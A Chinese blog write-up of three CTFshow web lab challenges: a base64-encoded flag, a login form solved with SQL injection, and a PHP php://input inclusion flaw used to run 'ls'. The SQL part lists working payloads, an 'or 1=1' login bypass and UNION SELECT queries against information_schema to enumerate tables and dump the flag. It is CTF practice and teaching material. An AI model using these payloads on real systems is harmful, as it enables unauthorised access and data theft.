CTFshow web类(1~3)

最新推荐文章于 2024-07-14 09:37:06 发布
最新推荐文章于 2024-07-14 09:37:06 发布
阅读量85 收藏 1
点赞数 1
文章标签: 前端 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60399102/article/details/132831239
版权

1,wed签到题

进入靶场页面如下,先检查一下页面源代码。

得到一串编码后的字符串,bese64解码得到flag。

2,web2

进入页面是一个登陆表单,sql注入是了。

万能密码可以登陆,那么闭合差不多也就是这样。

1' or 1=1 #

 

这时候向闭合里拼接SQL语句就好了,使用order by来判断回显,但是始终没显示,一时间怀疑人生,虽然题目介绍是最简单的sql注入,但是还是在这一步卡了一会,参考了一下hint,还是菜了。。。。可以不使用order by,直接通过使用联合查询来判断回显。

1' or 1=1 union select 1,2,3#

 

判断出字段数是三,回显位是第二位,剩下来的走一趟联合注入流程了。

1,查库名。

1'or 1=1 union select 1,database(),3,4#

 

2,查库中表的数量。这时候要提到limit的用法了,这个语句主要用来限制回显的,具体用法给个传送门mysql中limit的用法是什么-mysql教程-PHP中文网

1' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema = 'web2'),3 limit 1,2;#--

 

两个表

3,显示第一个表的表名。

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 0,1),3 limit 1,2;#

应该就是flag位置所在了。但我们还是再看看另一个表。

//查第二个表
' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 1,2),3 limit 1,2;#

 

表名user

4, 查表flag中列的数量。

' or 1=1 union select 1,(select count(*) from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#--

 

只有一列

5,查列名

' or 1=1 union select 1,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#--

 

列名也叫fiag。

6,查fiag列中的字段数

' or 1=1 union select 1,(select count(*) from flag),3 limit 1,2;#--

 

只有一条字段。

7,查字段

' or 1=1 union select 1,(select flag from flag limit 0,1),3 limit 1,2;#--

 

得到flag,这题主要了解一下limit的用法。

3,web3

进入靶场,看到提示include,这一般是使用php伪协议,那么抓包构造一下表单。

通过get传参,向url赋php://input函数,然后让其执行php语句中systeam命令‘ls’来显示网站下所有

页面。

可见有一个ctf_go_go_go index.php,我们来读一下它。

发送表单得到flag。

 

觉策
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFshow 1-10关
weixin_62369433的博客
11-11 2166
CTFshow 1-10 通关详解
第四周任务
stronelu的博客
03-30 370
首先来到目界面,我们看到的是源码:随后我们进行抓包,将代码输入之后,我们就可以得到。
ctfshow SSRF web351~360
shinygod的博客
09-25 1273
SSRF练习和学习
ctfshow XSS web316~web333
shinygod的博客
11-25 1843
ctfshow XSS web316~web333
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
OpenSNN推文:近期优质博客推荐汇总
opensnn的博客
07-12 310
国内个人博客站点众多,涵盖了技术、生活、艺术等多个领域。
更新商品前端接口编写
weixin_55639995的博客
07-12 345
那么在vue运行的时候,会加载所有的ref属性特征的元素还有组件。标签中ref的作用就是将 该组件注册到vue对象的ref属性中。使用插槽,那个scope就是代表着一行的数据。然后里面的选项遍历的是 js定义的数据。如果文字显示过多可以使用 文本隐藏显示。表单绑定还有表单数据的绑定。数据绑定使用的表单绑定状态。写form表单然后封装数据。状态的选择使用的是选择框。副标使用的是文本域。状态页面使用,下拉框。富文本选择器使用组件。使用后端枚举型去写。
如何搭建互联网医院系统源码?医疗陪诊APP开发实战详解
meihusdk的博客
07-11 287
希望本文能够为正在或即将从事相关开发的技术人员提供一些参考和帮助。通过不断的努力和创新,我们可以为患者提供更优质的医疗服务,推动医疗行业的数字化转型。
Node多版本管理器NVM安装使用
GongWeiBuQi的博客
07-11 202
安装node很方便,只需要一条命令可以轻松切换node版本可以多版本node并存。
Javafx利用fxml变换场景的小细节
2301_80311013的博客
07-09 918
在这个代码中,在JavaFX中,FXMLLoader是用来加载FXML文件并将其转换为Java对象(例如控制器)的工具。当您使用FXMLLoaderFXMLLoader在整个过程中,FXMLLoader是使用JavaFX的后台线程(也称为JavaFX线程)来执行这些操作的,这是为了保持UI线程的响应性。这意味着在用户界面(UI)线程中,您不会看到任何阻塞,即使FXMLLoader正在执行耗时的操作。当FXMLLoader完成加载并调用load()方法时,它会返回一个Parent。
一个使用Go语言和现代Web技术构建跨平台桌面应用程序开源项目
yunmoon的博客
07-10 1063
Wails作为一个桥梁,连接强大的Go后端逻辑与丰富的Web前端界面,允许开发者利用两者的最佳特性来开发应用。
Webkit简介以及工作流程
读心悦
07-10 332
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
Power Apps使用oData访问表数据并赋值前端
最新发布
weixin_41850878的博客
07-14 220
console.log需要F12打开浏览器开发者工具查看。方法过滤数据时,你可以指定一个OData。方法成功的例子,它使用了OData。在使用OData查询语法通过。参数来限制返回的记录集。
​​ 翻页 上一页/下一页
szzlh123456789的博客
07-09 382
【代码】​​ 翻页 上一页/下一页。
ctfshow web3
08-15
在CTF比赛中,"ctfshow web3"是一个目的名称。根据引用和引用的描述,这道目涉及到了一个PHP伪协议文件包含漏洞。参赛者需要使用代理软件(如Burp Suite)进行抓包,并利用php://input伪协议执行PHP代码。通过构造GET请求的URL和POST请求的内容,可以执行系统命令(如ls)并查看当前目录下的所有文件。 另外,引用提供了一个关于序列化的例子,可能与这道目的解思路有关。在这个例子中,通过serialize函数对一个对象进行序列化,并输出其序列化后的结果。 综上所述,ctfshow web3目涉及到PHP伪协议文件包含漏洞和序列化的技巧。参赛者需要使用代理软件进行抓包,构造合适的请求,并利用PHP代码执行系统命令或其他操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow-WEB-web3](https://blog.csdn.net/wangyuxiang946/article/details/119810750)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ctfshow-web(三)](https://blog.csdn.net/qq_47804678/article/details/128197872)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [ctfshow web3](https://blog.csdn.net/weixin_51866363/article/details/109860700)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值